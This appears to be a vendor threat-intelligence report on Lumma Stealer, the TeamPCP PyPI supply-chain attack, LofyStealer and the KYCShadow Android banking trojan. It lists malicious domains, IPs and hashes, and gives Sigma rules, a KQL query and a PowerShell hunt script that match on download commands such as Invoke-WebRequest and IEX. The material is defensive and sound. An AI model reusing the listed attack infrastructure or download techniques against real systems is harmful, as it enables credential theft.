Lumma Stealer, TeamPCP, and KYCShadow: Multi-Vector Credential Theft Ecosystem Analysis

Threat Summary

Recent OTX pulses indicate a surge in diverse credential theft campaigns moving beyond traditional infostealers to include sophisticated supply chain attacks and mobile banking trojans. The threat landscape is dominated by the convergence of Lumma Stealer (distributed via ClickFix phishing and GhostSocks proxy botnets), TeamPCP's weaponization of the popular Telnyx Python SDK, and KYCShadow, an Android trojan targeting banking customers.

The collective objective of these actors is the mass harvesting of authentication data (cookies, passwords, tokens, OTPs) and financial information (IBANs, credit cards). These campaigns leverage a "Malware-as-a-Service" (MaaS) model, with GhostSocks specifically providing residential proxy infrastructure to obfuscate Lumma Stealer traffic. The attack chains involve complex evasion techniques including steganography (TeamPCP), PowerShell obfuscation (ClickFix), and Firebase-based C2 for mobile malware.

Threat Actor / Malware Profile

1. TeamPCP (Telnyx SDK Supply Chain)

Distribution: Malicious packages uploaded to PyPI (Python Package Index).
Malware Families: msbuild.exe, sysmon.py, Credential Harvester.
Behavior: A three-stage architecture. The trojanized package triggers a platform-specific loader that downloads a second-stage payload hidden inside a WAV file using steganography.
Objective: Steal credentials, encrypt them, and exfiltrate.
Persistence: Uses legitimate Python SDK execution flow.

2. LofyGang (LofyStealer)

Distribution: Social engineering targeting Minecraft players.
Malware Families: LofyStealer, GrabBot, chromelevator.
Behavior: A 53.5MB Node.js loader disguised as legitimate libraries, dropping a 1.4MB memory-resident C++ payload.
Objective: Exfiltrate cookies, passwords, tokens, credit cards, and IBANs from 8+ browsers.
Evasion: Syscalls evasion, memory-only execution.

3. GhostSocks & Lumma Stealer (ClickFix)

Distribution: ClickFix-style phishing sites, Russian underground forums.
Malware Families: HijackLoader, Lumma Stealer (S1213).
Behavior: Users tricked into running obfuscated PowerShell commands, downloading malicious MSI payloads. Uses DLL sideloading with renamed binaries.
C2 Communication: GhostSocks utilizes SOCKS5 and TLS encryption to blend traffic; Lumma Stealer exfiltrates data via these proxy nodes.
Objective: Establish residential proxy botnet for credential theft and traffic anonymization.

4. KYCShadow (Android Banking)

Distribution: WhatsApp messages posing as bank KYC verification.
Malware Families: KYCShadow.
Behavior: Multi-stage dropper using WebView-based phishing and native code obfuscation.
C2 Communication: Firebase-based remote execution.
Objective: Intercept OTPs, steal banking credentials, manipulate VPN traffic to bypass SMS filtering.

IOC Analysis

The provided indicators reveal a hybrid infrastructure utilizing commodity hosting and specialized domains.

File Hashes: Multiple SHA256, MD5, and SHA1 hashes associated with loaders (Node.js), payloads (C++), and malicious MSI installers. SOC teams should immediately block execution of these hashes via EDR policies.
Network Indicators:
- Domains: aquasecurtiy.org (typo-squatting), serv.biz, retreaw.click, w2.bruggebogeyed.site.
- IPs: 85.11.161.198, 24.152.36.241.
Operationalization: IOCs should be ingested into SIEM Correlation engines and Firewall/IPS blocklists. The domains serv.biz and serv.xyz are critical for blocking the KYCShadow C2. The IP 85.11.161.198 is a key delivery node for the ClickFix MSI payloads.

Detection Engineering

Sigma Rules

YAML

title: Suspicious PowerShell Downloading MSI File (ClickFix/Lumma)
id: a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d
description: Detects PowerShell processes downloading .msi files, a common behavior in ClickFix campaigns distributing HijackLoader and Lumma Stealer.
status: experimental
date: 2026/04/30
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427...
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'DownloadFile'
            - 'IEX'
            - 'DownloadString'
    selection_filter:
        CommandLine|contains: '.msi'
    condition: selection and selection_filter
falsepositives:
    - Legitimate software installation scripts
level: high
---
title: Python SDK Spawning MSBuild or Steganography Tools (TeamPCP)
id: b2c3d4e5-f6a7-4b8c-9d0e-1f2a3b4c5d6e
description: Detects Python processes (pip/python.exe) spawning msbuild.exe or accessing steganography-related utilities, indicative of the TeamPCP supply chain attack.
status: experimental
date: 2026/04/30
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427...
tags:
    - attack.defense_evasion
    - attack.t1202
logsource:
    product: windows
    category: process_creation
detection:
    parent:
        Image|endswith:
            - '\python.exe'
            - '\pip.exe'
    child:
        Image|endswith:
            - '\msbuild.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'steg'
            - 'wav'
    condition: parent and child
falsepositives:
    - Legitimate developer build environments
level: high
---
title: Potential KYCShadow C2 Communication (Android)
id: c3d4e5f6-a7b8-4c9d-0e1f-2a3b4c5d6e7f
description: Detects network connections to known KYCShadow C2 domains often used for Firebase communication and OTP interception.
status: experimental
date: 2026/04/30
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427...
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    product: android
    category: network_connection
detection:
    selection:
        DestinationHostname|contains:
            - 'serv.biz'
            - 'serv.xyz'
            - 'api.biz'
    condition: selection
falsepositives:
    - Unknown
level: critical

KQL Hunt Query (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for ClickFix PowerShell activity and GhostSocks/Lumma C2 traffic
let IOCs = dynamic(["85.11.161.198", "24.152.36.241", "aquasecurtiy.org", "retreaw.click", "serv.biz", "serv.xyz", "api.biz"]);
let MaliciousHashes = dynamic(["f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc", "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881"]);
// Process Creation Events
DeviceProcessEvents
| where InitiatingProcessFileName =~ "powershell.exe" 
| where ProcessCommandLine has ".msi" or ProcessCommandLine has "http"
| extend URL = extract("http\\://[^\s]+.*\\.msi", 0, ProcessCommandLine)
| project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, URL, FolderPath
| union (DeviceNetworkEvents
| where RemoteUrl has_any(IOCs) or RemoteIP has_any(IOCs)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName)
| union (DeviceFileEvents
| where SHA256 has_any(MaliciousHashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256)
| order by Timestamp desc

PowerShell Hunt Script

PowerShell

# IOC Hunt Script for TeamPCP, LofyStealer, and Lumma Stealer
$MaliciousHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "d21a5d08b4614005c8fcd9d0068f0190",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "818daf975f78ac30ba4ce0fdd2f7eb550cdc16701da35594e8c9cba72bc84a5c"
)

$MaliciousDomains = @(
    "aquasecurtiy.org",
    "retreaw.click",
    "w2.bruggebogeyed.site",
    "robinhuds.com",
    "serv.biz",
    "serv.xyz"
)

Write-Host "[+] Checking for malicious file hashes..."
$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root
foreach ($Hash in $MaliciousHashes) {
    Get-ChildItem -Path $Drives -Recurse -ErrorAction SilentlyContinue | 
    Get-FileHash -Algorithm SHA256 -ErrorAction SilentlyContinue | 
    Where-Object { $_.Hash -eq $Hash } | 
    Select-Object Path, Hash
}

Write-Host "[+] Checking DNS Cache for malicious domains..."
$DnsCache = Get-DnsClientCache
foreach ($Domain in $MaliciousDomains) {
    $DnsCache | Where-Object { $_.Entry -like "*$Domain*" } | Select-Object Entry, Data
}

Write-Host "[+] Checking for suspicious Telnyx Python SDK packages (TeamPCP)"
# Basic heuristic check for telnyx package presence in common site-packages
$pipList = pip list 2>$null
if ($pipList -match "telnyx") {
    Write-Host "[!] Telnyx package found. Verify version immediately."
}

Response Priorities

Immediate: Block all listed IOCs (Domains, IPs, Hashes) at the perimeter and endpoint. Investigate any PowerShell processes spawning msiexec or downloading .msi files.
24 Hours: Initiate credential resets for accounts accessed from devices flagged by EDR alerts related to Lumma Stealer or LofyStealer. Audit Python package repositories for instances of the telnyx SDK and verify checksums.
1 Week: Review supply chain security for open-source dependencies. Implement strict application allowlisting for Python environments. Enhance mobile device management (MDM) policies to block side-loaded APKs and warn users against KYC scams on WhatsApp.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub